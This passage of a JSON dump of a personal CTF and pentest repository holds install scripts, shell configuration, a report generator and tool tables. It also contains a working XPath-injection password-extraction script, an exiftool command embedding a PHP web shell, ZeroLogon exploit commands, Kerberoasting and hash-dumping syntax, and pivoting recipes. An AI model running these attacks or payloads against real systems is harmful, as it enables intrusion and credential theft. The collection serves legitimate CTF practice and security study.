'cyberwr3ch' + Fore.LIGHTBLACK_EX + '\\nMember of TCSC')\r\n print(Fore.YELLOW + \"Script that scans ports and enumerate dirs for CTF's\")\r\n time.sleep(3)\r\n nmap()\r\n"
},
{
"path": "scripts/hackthebox/xpath-inj.py",
"content": "import requests\n\n#variables, add the suspicious users, in u [] list\nurl = ''\nproxy_url = ''\nw = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*(){}:\"<>?'\nu = []\n\n\n#main logic for injection\nfor user in u:\n data = {'Username': '', 'Password': \"' or Username='\" + user + \"'and substring(Password,0,1)='x\"}\n request = requests.post(url,data=data, proxies={'http':proxy_url})\n b = len(request.text) #6756\n cracked_pass = ''\n for i in range(1,80):\n found = False\n for c in w:\n data = {'Username':'', 'Password': \"' or Username='\" + user + \"' and substring(Password,\" + str(i) + \",1)='\" + c + \"\"}\n request = requests.post(url,data=data, proxies={'http':proxy_url})\n if len(request.text) != b:\n found = True\n break\n \n if not found:\n \n print(' Attempting User {0}'.format(user))\n print('Found Character: {2}'.format(user, i, c))\n cracked_pass += c\n print(cracked_pass)\n"
},
{
"path": "scripts/installation/docker-linux.sh",
"content": "#!/bin/bash\n\ncurl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -\necho 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list\nsudo apt update\nsudo apt remove docker docker-engine docker.io -y 2>/dev/null\nsudo apt install docker-ce -y\n"
},
{
"path": "scripts/installation/docker-parrot.sh",
"content": "#!/bin/bash\n\nif [ $EUID -ne 0 ];then\n\techo \"Please Run as root\"\n\texit\nfi\n\nsudo apt-get remove docker docker-engine docker.io containerd runc 2>/dev/null\nsudo apt-get update\nsudo apt-get install \\\n apt-transport-https \\\n ca-certificates \\\n curl \\\n gnupg-agent \\\n software-properties-common\ncurl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -\necho \"deb [arch=amd64] https://download.docker.com/linux/debian buster stable\" >> /etc/apt/sources.list\nsudo apt-get update\nsudo apt-get install docker-ce docker-ce-cli containerd.io\n"
},
{
"path": "scripts/installation/docker-standard.sh",
"content": "#!/bin/bash\n\ncurl -fsSL https://get.docker.com -o get-docker.sh\nsudo sh get-docker.sh\n"
},
{
"path": "scripts/installation/fping-install.sh",
"content": "#!/bin/bash\n\nsudo apt-get install fping\n"
},
{
"path": "scripts/installation/pwntools-python3.sh",
"content": "git clone https://github.com/arthaud/python3-pwntools; cd python3-pwntools; pip3 install -e .\n"
},
{
"path": "scripts/installation/python2-pip.sh",
"content": "#!/bin/bash\n\ncurl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py; python get-pip.py\n"
},
{
"path": "scripts/installation/python3-pip.sh",
"content": "#!/bin/bash\n\nsudo apt-get install python3-pip\n"
},
{
"path": "scripts/misc/adapter.sh",
"content": "#!/bin/bash\n\ndn=`ifconfig tun0 2>/dev/null | grep -P \"10.10.*.* \" | awk '{print $2}'`\nnd=`ifconfig eth0 | grep -P \"192.168.[0-9]{3}.[0-9]{3}\" | awk '{print $2}'`\n\nif [[ -z $dn ]]\nthen\n\techo $nd 2>/dev/null\nelse\n\techo $dn\nfi\n"
},
{
"path": "scripts/misc/bashrc_custom",
"content": "case $- in\n *i*) ;;\n *) return;;\nesac\n\nHISTCONTROL=ignoreboth\n\nshopt -s histappend\n\nHISTSIZE=1000\nHISTFILESIZE=2000\n\nshopt -s checkwinsize\n\n#shopt -s globstar\n\n#[ -x /usr/bin/lesspipe ] && eval \"$(SHELL=/bin/sh lesspipe)\"\n\nif [ -z \"${debian_chroot:-}\" ] && [ -r /etc/debian_chroot ]; then\n debian_chroot=$(cat /etc/debian_chroot)\nfi\n\ncase \"$TERM\" in\n xterm-color) color_prompt=yes;;\nesac\n\nforce_color_prompt=yes\n\nif [ -n \"$force_color_prompt\" ]; then\n if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then\n\t# We have color support; assume it's compliant with Ecma-48\n\t# (ISO/IEC-6429). (Lack of such support is extremely rare, and such\n\t# a case would tend to support setf rather than setaf.)\n\tcolor_prompt=yes\n else\n\tcolor_prompt=\n fi\nfi\n\n#htb_ip=`ifconfig tun0 | grep inet | tr -s \" \" | awk 'NR==1{print $2}'`\nhtb_ip=$(ip addr | grep tun0 | grep inet | grep 10. | tr -s \" \" | cut -d \" \" -f 3 | cut -d \"/\" -f 1)\n\n\n\nif [ \"$color_prompt\" = yes ]; then\n PS1=\"${debian_chroot:+($debian_chroot)}\\[\\033[01;34m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;97m\\]\\W\\[\\033[00m\\]:[\\033[01;96m\\]$htb_ip\\033[00m\\]]\\$ \"\nelse\n PS1='βββ[\\u@\\h]β[\\w]\\nββββΌ \\$ '\nfi\n\n# Set 'man' colors\nif [ \"$color_prompt\" = yes ]; then\n\tman() {\n\tenv \\\n\tLESS_TERMCAP_mb=$'\\e[01;31m' \\\n\tLESS_TERMCAP_md=$'\\e[01;31m' \\\n\tLESS_TERMCAP_me=$'\\e[0m' \\\n\tLESS_TERMCAP_se=$'\\e[0m' \\\n\tLESS_TERMCAP_so=$'\\e[01;44;33m' \\\n\tLESS_TERMCAP_ue=$'\\e[0m' \\\n\tLESS_TERMCAP_us=$'\\e[01;32m' \\\n\tman \"$@\"\n\t}\nfi\n\nunset color_prompt force_color_prompt\n\n# If this is an xterm set the title to user@host:dir\ncase \"$TERM\" in\nxterm*|rxvt*)\n #PS1=\"\\[\\033[1;32m\\]\\342\\224\\200[\\[\\033[1;37m\\]\\u\\[\\033[01;32m\\]@\\[\\033[01;34m\\]\\h\\[\\033[1;32m\\]]\\342\\224\\200[\\[\\033[1;37m\\]\\w\\[\\033[1;32m\\]]\\\\$\\[\\e[0m\\] \"\n PS1=\"\\[\\033[0;31m\\]\\342\\224\\214\\342\\224\\200\\$([[ \\$? != 0 ]] && echo \\\"[\\[\\033[0;31m\\]\\342\\234\\227\\[\\033[0;37m\\]]\\342\\224\\200\\\")[$(if [[ ${EUID} == 0 ]]; then echo '\\[\\033[01;31m\\]root\\[\\033[01;33m\\]@\\[\\033[01;96m\\]\\h'; else echo '\\[\\033[0;39m\\]\\u\\[\\033[01;33m\\]@\\[\\033[01;96m\\]\\h'; fi)\\[\\033[0;31m\\]]\\342\\224\\200[\\[\\033[0;32m\\]\\w\\[\\033[0;31m\\]]\\n\\[\\033[0;31m\\]\\342\\224\\224\\342\\224\\200\\342\\224\\200\\342\\225\\274 \\[\\033[0m\\]\\[\\e[01;33m\\]\\\\$\\[\\e[0m\\]\"\n ;;\n*)\n ;;\nesac\n\n# enable color support of ls and also add handy aliases\nif [ -x /usr/bin/dircolors ]; then\n test -r ~/.dircolors && eval \"$(dircolors -b ~/.dircolors)\" || eval \"$(dircolors -b)\"\n alias ls='ls --color=auto'\n alias dir='dir --color=auto'\n alias vdir='vdir --color=auto'\n\n alias grep='grep --color=auto'\n alias fgrep='fgrep --color=auto'\n alias egrep='egrep --color=auto'\nfi\n\n# some more ls aliases\nalias ll='ls -lh'\nalias la='ls -lha'\nalias l='ls -CF'\nalias em='emacs -nw'\nalias dd='dd status=progress'\nalias _='sudo'\nalias _i='sudo -i'\nalias please='sudo'\nalias fucking='sudo'\nalias chuck_norris_says='sudo'\n\n# Alias definitions.\n# You may want to put all your additions into a separate file like\n# ~/.bash_aliases, instead of adding them here directly.\n# See /usr/share/doc/bash-doc/examples in the bash-doc package.\n\nif [ -f ~/.bash_aliases ]; then\n . ~/.bash_aliases\nfi\n\n# enable programmable completion features (you don't need to enable\n# this, if it's already enabled in /etc/bash.bashrc and /etc/profile\n# sources /etc/bash.bashrc).\nif ! shopt -oq posix; then\n if [ -f /usr/share/bash-completion/bash_completion ]; then\n . /usr/share/bash-completion/bash_completion\n elif [ -f /etc/bash_completion ]; then\n . /etc/bash_completion\n fi\nfi\n\n\nrt(){\n clear && source ~/.bashrc\n }\n"
},
{
"path": "scripts/misc/fix-bg-noise-obs.sh",
"content": "\n# Microphone Realtime background noise reduction script\n# author Luigi Maselli - https://grigio.org licence: AS-IS\n# credits: http://askubuntu.com/questions/18958/realtime-noise-removal-with-pulseaudio\n# run as: sudo && pulseaudio -k\n# source: https://gist.github.com/adrianolsk/bfa32f3227dc674eff72a2008f6c0316\n# run this and change the mic to \"BUILT IN Audio Analog\"\n\nsudo cp /etc/pulse/default.pa /etc/pulse/default.pa.bak\nsudo cat <> /etc/pulse/default.pa\nload-module module-echo-cancel source_name=noechosource sink_name=noechosink\nset-default-source noechosource\nset-default-sink noechosink\nEOT\n"
},
{
"path": "scripts/misc/pdf-protect.sh",
"content": "#!/bin/bash\n\necho Enter the directory name:\nread dir_ \ncd $dir_\necho enter the root hash\nread hash_\ndn=$(basename *.pdf)\necho The found pdf is $dn\ndnd=$(echo $dn | cut -d '.' -f 1)\npdftk $dn output $dnd-Protected.pdf userpw $hash_\n\n\n"
},
{
"path": "scripts/misc/report-gen.md",
"content": "---\ntitle: \"\"\nauthor: cyberwr3nch\ndate: \"<date>\"\nsubject: \"Hackthebox writeup\"\nkeywords: [smb, ftp]\nsubtitle: \"Writeup from cyberwr3nch\"\nlang: \"en\"\ntitlepage: true\ntitlepage-color: \"000000\"\ntitlepage-text-color: \"FFFFFF\"\ntitlepage-rule-color: \"FFFFFF\"\ntitlepage-rule-height: 0\ntitlepage-background: \"tp1.jpg\"\nbook: true\nclassoption: oneside\ncode-block-font-size: \\scriptsize\n---\n\n# MainHeading\n## Subheading\n\n> text\n\n```bash\ncode code-block-font-size\n\nwhoami\n```\n\n"
},
{
"path": "scripts/misc/report.sh",
"content": "#!/bin/bash\n\n################################################################################################\n# start the markdown with a frontmatter\n# --- \n# title: \"Attacktive Directory [TryHackMe]\" \n# author: cyberwr3nch \n# date: \"2021-02-21\" \n# subject: \"Active Directory Basics\" \n# keywords: [ad, enum4linux, domain, domain controller, internal PT] \n# subtitle: \"Basics of Active Directory Exploitation\" \n# lang: \"en\" \n# titlepage: true \n# titlepage-color: \"1E90FF\" \n# titlepage-text-color: \"000000\" \n# titlepage-rule-color: \"FFFFFF\" \n# titlepage-rule-height: 1 \n# book: true \n# classoption: oneside \n# code-block-font-size: \\scriptsize \n# --- \n## Vim Shortcuts to include the formatter\n## Remove the start with #<space> --> :%s/^#\\s//g \n## Remove the unwanted whitespace characters --> :%s/\\s//g \n################################################################################################\n\n\n\n# variables\nRED='\\033[0;31m'\nNC='\\033[0m'\nBLUE='\\033[0;34m'\nYELLOW='\\033[1;33m'\n\n# main usage\nif [ \"$#\" -ne 2 ]; then\n echo -e \"[${YELLOW}*${NC}] Usage: $0 <input.md> <output.pdf>\"\n # echo \"Themes: pygments, kate, monochrome, breezeDark, espresso, zenburn, haddock, tango\"\n # change line 73 to one of these themes\n exit\nfi\n\n# pandoc check\necho -e \"[${YELLOW}-${NC}] Checking for availability of pandoc..\"\nif ! command -v pandoc &> /dev/null\nthen \n echo -e \"[${RED}+${NC}] Pandoc not installed \\n\"\n read -p \"Do you want to install pandoc (Y/n) ?\" -n 1 -r\n if [[ $REPLY =~ ^[Yy]$ ]]\n then\n echo -e \"\\n[${BLUE}+${NC}] Installing Pandoc...\"\n sudo apt-get install pandoc\n else\n echo -e \"\\n[${RED}*${NC}] pandoc not found \"\n exit\n fi\nelse\n echo -e \"[${BLUE}+${NC}]Pandoc seems to be installed\"\nfi\n\n\n# texlive checking\necho -e \"[${YELLOW}-${NC}] Checking for latex installation ...\"\nif ! command -v latex &> /dev/null\nthen \n echo -e \"[${RED}+${NC}] latex is not installed \\n\"\n read -p \"Do you want to install texlive-full (Y/n) ? \" -n 1 -r\n echo\n if [[ $REPLY =~ ^[Yy]$ ]]\n then\n echo -e \"\\n[${BLUE}+${NC}] Installing texlive-full\"\n sudo apt-get install texlive-full\n else\n echo -e \"\\n[${RED}*${NC}] Latex Not found\"\n exit\n fi\nelse\n echo -e \"[${BLUE}+${NC}] latex is installed\"\nfi\n\n# esivogel check\necho -e \"[${YELLOW}-${NC}] Checking for the availability of esivogel.latex...\"\n\nif [ ! -e /usr/share/pandoc/data/templates/eisvogel.latex ];then\n read -p \"eisvogel.latex is not want to download and intstall it (Y/n) ? \" -n 1 -r\n if [[ $REPLY =~ ^[Yy]$ ]]\n then\n cd /tmp/; wget https://github.com/Wandmalfarbe/pandoc-latex-template/releases/download/v2.0.0/Eisvogel-2.0.0.tar.gz; tar -zxvf Eisvogel-2.0.0.tar.gz; sudo cp eisvogel.latex /usr/share/pandoc/data/templates/eisvogel.latex;\n echo -e \"\\n[${BLUE}+${NC}] eisvogel.latex added\"\n else\n echo -e \"\\n[${RED}*${NC}] eisvogel.latex is not found\"\n exit\n fi\nelse\n echo -e \"[${BLUE}+${NC}] eisvogel.latex is found in /usr/share/pandoc/data/templates\" \nfi\n\n# file generate\npandoc $1 -o $2 \\\n--from markdown+yaml_metadata_block+raw_html \\\n--template eisvogel \\\n--table-of-contents \\\n--toc-depth 6 \\\n--number-sections \\\n--top-level-division=chapter \\\n--highlight-style breezeDark \n\n# output open\nif [ $? -eq 0 ];then\n echo \"Process finished\"\n read -p \"Do you want to open the PDF ? (Y/n) \" -n 1 -r\n if [[ $REPLY =~ ^[Yy]$ ]];then\n echo\n xdg-open $2\n else\n echo\n echo \"Bye Bye\"\n echo\n exit\n fi\nelse\n echo \"Bye Bye\"\nfi\n"
},
{
"path": "tools/README.md",
"content": "# Tools\n\n- Tools that I use during pentest `tools.md`\n\n#### Windows and Active Directory\n| Tool | Use | Command Syntax |\n| ---- | --- | -------------- |\n| [Bloodhound.py](https://github.com/fox-it/BloodHound.py) | BloodHound written in python. Used to obtain AD infromations from a windows machine | `python3 bloodhound-python -u <username> -p <passphrase> -ns <machineIP> -d <domainname> -c all` |\n| [Impackets](https://github.com/SecureAuthCorp/impacket) | Swiss Knife for most Windows AD attacks | `python GetNPUsers.py <domain_name>/ -usersfile <users_file>` = ASREPRoasting <br /> `python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password>` = Kerberoasting |\n| [Kerbrute](https://github.com/ropnop/kerbrute) | A tool written in GO to enumerate AD users | `./kerbrute userenum --dc <machine ip> -d <doaminname> <users_file>` |\n| [CredDump](https://github.com/moyix/creddump) | Used to obtain Cached Credentials, LSA Secrets and Password hash when system and sam files are available | `./pwdump.py <system hive> <sam hive>` = Obtain Password Credentials <br /> `./cachedump.py <system hive> <sam hive>` = obtain cached credentials <br /> `./lsadum.py <system hive> <sam hive>` = Obtain LSA Dumps |\n| [PwdDump](https://github.com/moyix/creddump) | After getting the `administrative` access, running this will get the password hashes | `.\\PwDump7.exe`|\n| [ApacheDirectoryStudio](https://directory.apache.org/studio/downloads.html) | LDAP browser which is used to analyze LDAP instance running on linux (CREDS required), here transferring the LDAP running on a victim machine and accessing it in the attacker machine | `sudo ssh -L 389:172.20.0.10:389 lynik-admin@10.10.10.189` |\n| [Windsearch](https://github.com/ropnop/go-windapsearch) | Enumerates anything as a authenticated user on the network with modules | `windsearch -d spookysec.local -u 'svc-admin' -p 'management2005' -m computers` |\n\n\n#### Port Forwarding\n| Tool | Use | Command Syntax|\n| ---- | --- | -------------- |\n| [Chisel](https://github.com/jpillora/chisel) | Used to forward a service running on a port in the victim machine | `./chisel server -p <port no.> --reverse` = on the attacker machine <br /> `./chisel client <attackerip:port> R:1234:127.0.0.1:1121` = Forwards the service running on port 1121 to the port 1234 on attackers machine |\n| [socat](https://github.com/craSH/socat) | Swiss Knife for Port forwarding | `socat TCP-LISTEN:8000,fork TCP:<machineIP>:<port>` = Listens on every connection to port `8000` and forwards to the `machineIP` and its `port` <br /> `socat TCP-LISTEN:9002,bind=<specific ip>,fork,reuseaddr TCP:localhost:<port>` = forward all incoming requests to the port 9002 from <specific ip> to the localhost port, reuseaddr is used to specify socat use the address (eg. localhost) even if its used by other services|\n| [plink](https://github.com/Plotkine/pentesting/blob/master/Windows_privilege_escalation/Windows-privesc-tib3rius/plink.exe) | SSH Putty in CLI mode | `.\\plink.exe <user@host> -R <remote port>:<localhost>:<local port>` .\\plink.exe kali@10.10.14.32 -R 8888:127.0.0.1:8888 = port forwards the service running on victim machines port 8888 to the attacker machines 8888 |\n| ssh | uses the built in ssh service to port forward a service | **Remote Port Forwarding:** <br /> > Command should be entered on the compromied machine<br />`ssh <user@host> -R <host>:<port open in host>:<localhost>:<port in victim machine> -N -f` <br /> ssh cyberwr3nch@192.168.XX.XX -R 192.168.XX.XX:3000:127.0.0.1:80 -N -f = Open the port 3000 in the cyberwr3nch's machine and forwards the service running in port 80 to the cyberwr3nch's 3000. So visiting 127.0.0.1:3000 in cyberwr3nch's browser will be the same of visiting 127.0.0.1:80 on the victim machine <br /> ================ <br /> **Dynamic Port Forwarding:** <br /> > Command to be executed on the attacker machine <br /> `ssh -D <port on attacker machine> <victim@victim_machine>`<br /> ssh -D 1234 victim@192.168.XX.XX = Command to be executed on the attackers machine, the port 1234 should be configured in the `/etc/proxychains.conf` as `socks4 127.0.0.1 1234`. If SSH Dynamic port forwarding fails, go for chisel method <br /> ================ <br /> **Local Port Forwarding:** <br /> > Command to be executed on the attacker machine <br /> `ssh -L 127.0.0.1:<port to req>:<internal ip>:<internal port> <intermediate_user@host>` <br /> ssh -L 127.0.0.1:8080:10.10.10.11:80 cyberwr3nch@10.10.10.10 = Whatever request to made to the attacker machine's port 8080 will travel through 10.10.10.10 and reach 10.10.10.11:80 <br /> `ssh -L <attacker machine port>:127.0.0.1:<port on service running> <user>@<host>` <br /> ssh -L 443:127.0.0.1:8443 nadine@10.10.10.21 -> The service running on 10.10.10.21:8443 is forwarded to attacker machine's port 443 when the port 443 is requested in attackers machine, the contents of 10.10.10.21:8443 are retrived|\n\n\n#### Directory Enumeration\n| Tool | Use | Command Syntax |\n| ---- | --- | -------------- |\n| [DirSearch](https://github.com/maurosoria/dirsearch) | Directory enumeration Tool | `python3 dirsearch.py -u <url> -e <extn>` |\n| [Gobuster](https://github.com/OJ/gobuster) | Directory enumeration tool written in GO | `gobuster dir -u <url> -w <wordlist> -x <extn> -b <hide status code> -t <threads>`|\n| [RustBuster](https://github.com/phra/rustbuster)| Direcotry Enumeration tool written in rust | `rustbuster dir -u <url> -w <wordlist> -e <extn>` |\n\n\n\n\n#### Post Exploitation\n| Tool | Use | Command Syntax |\n| ---- | --- | -------------- |\n| [LinEnum](https://github.com/rebootuser/LinEnum) | Post Enumeration scripts that automates enumeration | `./LinEnum.sh` |\n| [LinPeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) | Post Enumeration Script | `./linpeas.sh` |\n| [WinPEASbat/WinPEASexe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) | Windows post enumeration script and exe | `.\\winPEAS.bat` |\n\n\n#### Misc\n| Tool | Use | Command Syntax |\n| ---- | --- | -------------- |\n| [Exiftool](https://github.com/exiftool/exiftool) | Inspects the meta data of the image, Injects php payload in the comment section for file upload vulns, which can be added double extension `file.php.ext` | `./exiftool -Comment='<?php system($_GET['cmd']); ?>' <image.ext>`\n| [Git Dumper](https://github.com/arthaud/git-dumper) | Dump the Github repo if found in website | `./git-dumper.py <website/.git> <output folder>` |\n| [lxd-alpine builder](https://github.com/saghul/lxd-alpine-builder) | When a victim machine is implemented with lxc the privesc is done with this | [`article here`](https://www.hackingarticles.in/lxd-privilege-escalation/) |\n| [Php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell) | Php reverse shell, when an upload is possible change the IP and make req to obtain reverse shell | |\n| [ZerologonPOC](https://github.com/risksense/zerologon) | CVE-2020-1472 Exploit, sets the domain admin password as empty pass and dump the secrets. _PS: Latest Version of Impackets is required_ | `python3 set_empty_pw.py machinename/domainname machine IP; secretsdump.py -just-dc -no-pass machinename\\$@machineip`|\n| [Gopherus](https://github.com/tarunkant/Gopherus) | SSRF with `gopher://` protocol | `gophreus --exploit phpmemcache` |\n| [pse](https://github.com/ssstonebraker/Pentest-Service-Enumeration) | Quick notes from the terminal | | \n| [Shellerator](https://github.com/ShutdownRepo/shellerator) | Quick reverse shell commands generator | |\n| [Starship](https://starship.rs/guide/#%F0%9F%9A%80-installation) | Cool Bash interpreter | |\n| [bat](https://github.com/sharkdp/bat) | Colored man pages and cat | |\n| [colorls](https://github.com/athityakumar/colorls) | decorated ls | |\n| [exa](https://github.com/ogham/exa) | colored ls (JH Uses... I guess...) | |\n"
},
{
"path": "tools/tools.md",
"content": "# Tools for playing\n\n| Tool | Usage | Link |\n| ---- | ----- | ---- |\n| Bloodhound.py | BloodHound Written in Python. Obtain AD infromation from windows remotely | [fox-it](https://github.com/fox-it/BloodHound.py) |\n| Bloodhound | Native Bloodhound which requires neo4j and uses graphs to find vulnerabilities in AD | [BloodHoundAD](https://github.com/BloodHoundAD/BloodHound) |\n| Exiftool | Obtain metadata informations from an Image | [exiftool](https://github.com/exiftool/exiftool) |\n| LinEnum | Post Exploitation Script which automatically looks for juicy information from the compromised machine | [rebootuser](https://github.com/rebootuser/LinEnum) |\n| Apache Directory Studio | Kindof AD for linux | [apache directory studio](https://directory.apache.org/studio/downloads.html) |\n| Aquatone | Pass the CHROME installation path and a list of subdomains, it will automatically look snapshot and saves every website | [michenriksen](https://github.com/michenriksen/aquatone) | \n| Chisel | Ultimate Weapon for PortForwarding, Pivoting | [jpillora](https://github.com/jpillora/chisel) |\n| Creddump | Obtains informations from windows registry hives | [moyix](https://github.com/moyix/creddump) |\n| DirSearch | Directory Buster tool | [maurosoria](https://github.com/maurosoria/dirsearch) |\n| GitTools | Analyzes and segregates the files according to the commits | [internetwache](https://github.com/internetwache/GitTools) |\n| Gobuster | Directory Buster tool written in go | [OJ](https://github.com/OJ/gobuster) |\n| Gopherus | Tool to generate GOPHER payload to bypass the SSRF protection | [tarunkant](https://github.com/tarunkant/Gopherus) |\n| Impackets | SWISS repo for the AD and networking stuffs | [SecureAuthCorp](https://github.com/SecureAuthCorp/impacket) |\n| Kerbrute | Tool to enumerate accounts with Kerberos Pre-Auth Enabled | [ropnopnop](https://github.com/ropnop/kerbrute/releases/latest)\n| lxd-alpine-builder | Tool to create malicious LXC container | [saghul](https://github.com/saghul/lxd-alpine-builder) |\n| php-reverse-shell | PHP Reverseshell from PentestMonkey | [pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell) |\n| plink | SSH service for windows in the cli | [plink](https://the.earth.li/~sgtatham/putty/latest/w32/plink.exe) | \n| rustbuster | Directory Buster tool written in rust | [phra](https://github.com/phra/rustbuster) |\n| socat | Network Proxy tool which is with a highlevel functionalities | [craSH](https://github.com/craSH/socat) |\n| windows-binaries | Windows Binaries from kali-linux gitlab | [kali linux](https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/) |\n| PEASS | Post Exploit Enumeration script for windows/Linux | [carlospolop](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) |\n| zerologonPOC | POC for the AD vulnerability `CVE-2020-1472` | [risksense](https://github.com/risksense/zerologon) | \n| Username-Anarchy | Create a possible username combos with permutation | [urbanadventurer](https://github.com/urbanadventurer/username-anarchy) |\n\n"
}
]
![\"Dhanesh](\"https://cdn.buymeacoffee.com/buttons/v2/default-blue.png\")